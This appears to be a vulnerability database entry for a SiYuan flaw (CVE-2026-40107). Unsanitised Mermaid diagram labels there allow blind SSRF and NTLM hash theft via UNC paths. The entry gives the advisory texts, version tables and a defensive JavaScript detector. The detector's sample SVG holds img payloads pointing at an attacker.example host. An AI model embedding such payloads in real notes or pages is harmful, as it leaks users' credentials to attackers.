CVE-2026-40107
Published 2026-04-09
Priority P335 · Medium 6.5 (CVSS 3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)
EPSS 0.31% (22.2th percentile)
SiYuan is a personal knowledge management system. Prior to 3.6.4, SiYuan configures Mermaid.js with securityLevel: "loose" and htmlLabels: true. In this mode, HTML tags with src attributes survive Mermaid's internal DOMPurify and land in the HTML blocks embedded in the SVG. The SVG is injected via innerHTML with no secondary sanitization. When a victim opens a note containing a malicious Mermaid diagram, the Electron client fetches the URL. On Windows, a protocol-relative URL (//attacker.com/image.png) resolves as a UNC path (\\attacker.com\image.png). Windows attempts SMB authentication automatically, sending the victim's NTLMv2 hash to the attacker. This vulnerability is fixed in 3.6.4.
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| b3log | siyuan | < 3.6.4 | 3.6.4 |
| github.com | siyuan-note_siyuan_kernel | >= 0 < 0.0.0-20260407035653-2f416e5253f1 | 0.0.0-20260407035653-2f416e5253f1 |
| siyuan-note | siyuan | < 3.6.4 | 3.6.4 |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 6.5 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N |
| NVD | 4.0 | 8.7 | HIGH | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
GHSA (2026-04-10): SiYuan Affected by Zero-Click NTLM Hash Theft and Blind SSRF via Mermaid Diagram Rendering
CVE-2026-40107 · HIGH · CWE-918
SiYuan configures Mermaid.js with `securityLevel: "loose"` and `htmlLabels: true`. In this mode, HTML tags with `src` attributes survive Mermaid's internal DOMPurify and land in the HTML blocks embedded in the SVG. The SVG is injected via `innerHTML` with no secondary sanitization. When a victim opens a note containing a malicious Mermaid diagram, the Electron client fetches the URL.
On Windows, a protocol-relative URL (`//attacker.com/image.png`) resolves as a UNC path (`\\attacker.com\image.png`). Windows attempts SMB authentication automatically, sending the victim's NTLMv2 hash to the attacker.
## Root Cause
Mermaid initialization at `app/src/protyle/render/mermaidRender.ts` lines 28 and 33:
```ts
mermaid.initialize({
  securityLevel: "loose",  // HTML in labels passes through Mermaid's DOMPurify
  // ... other options elided in the source excerpt ...
  htmlLabels: true,        // labels are rendered as HTML, not SVG text
});
```
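As an added example (not SiYuan's or Mermaid's own code), this is the kind of check a renderer can run on the SVG string before handing it to `innerHTML`: it classifies each `src=` value by the behaviour the advisory describes (a protocol-relative URL becoming a UNC path on Windows, an outbound fetch for any other non-local scheme) and reports the risky ones. The function names, the `RISK` labels and the sample SVG are assumptions constructed for the example.

```javascript
// Risk labels for src= values that reach the rendered SVG (names assumed).
const RISK = {
  PROTOCOL_RELATIVE: "protocol-relative URL: resolves to a UNC path on Windows",
  UNC: "UNC path: triggers automatic SMB authentication",
  FILE: "file: URL: local file read",
  REMOTE: "non-local scheme: outbound fetch (blind SSRF / tracking)",
};

// Returns a risk label, or null when the value stays local. Relative paths
// and inline data:image/ URLs cause no network or SMB access.
function classifySrc(src) {
  const s = src.trim();
  if (/^\/\//.test(s)) return RISK.PROTOCOL_RELATIVE; // //host/path
  if (/^\\\\/.test(s)) return RISK.UNC;               // \\host\share
  if (/^file:/i.test(s)) return RISK.FILE;
  if (/^data:image\//i.test(s)) return null;
  if (/^[a-z][a-z0-9+.-]*:/i.test(s)) return RISK.REMOTE; // http:, https:, ...
  return null;
}

// Pulls every src="..." or src='...' out of the SVG markup and keeps the risky
// ones. A regex is fine for triaging the renderer's own output; it does not
// replace a real sanitizer pass before the markup reaches innerHTML.
function findRiskySources(svgMarkup) {
  const findings = [];
  const re = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
  let m;
  while ((m = re.exec(svgMarkup)) !== null) {
    const src = m[1] !== undefined ? m[1] : m[2];
    const risk = classifySrc(src);
    if (risk) findings.push({ src, risk });
  }
  return findings;
}

// Constructed sample of what loose mode with htmlLabels lets through: HTML
// <img> elements inside a diagram label, carried into the SVG unchanged.
const SAMPLE_SVG =
  '<svg><g class="label"><foreignObject><div>' +
  '<img src="//attacker.example/image.png">' +
  '<img src="data:image/png;base64,iVBORw0KGgo=">' +
  "<img src='\\\\attacker.example\\share\\i.png'>" +
  '<img src="./icons/ok.png">' +
  '</div></foreignObject></g></svg>';

console.log(findRiskySources(SAMPLE_SVG)); // two findings: protocol-relative and UNC
```

Mermaid's documented default, `securityLevel: "strict"`, encodes HTML in label text instead of passing it through, which is the baseline the loose setting above departs from.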
VulDB (2026-04-10, CVSS 8.7): SiYuan up to 3.6.3 Mermaid Mermaid.js server-side request forgery (GHSA-w95v-4h65-j455)
CVE-2026-40107 · HIGH
A vulnerability was found in SiYuan up to 3.6.3. It has been declared as critical. This issue affects some unknown processing of the file Mermaid.js of the component Mermaid Handler. The manipulation results in server-side request forgery.
This vulnerability is reported as CVE-2026-40107. The attack can be launched remotely. No exploit exists.
It is recommended to upgrade the affected component.
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.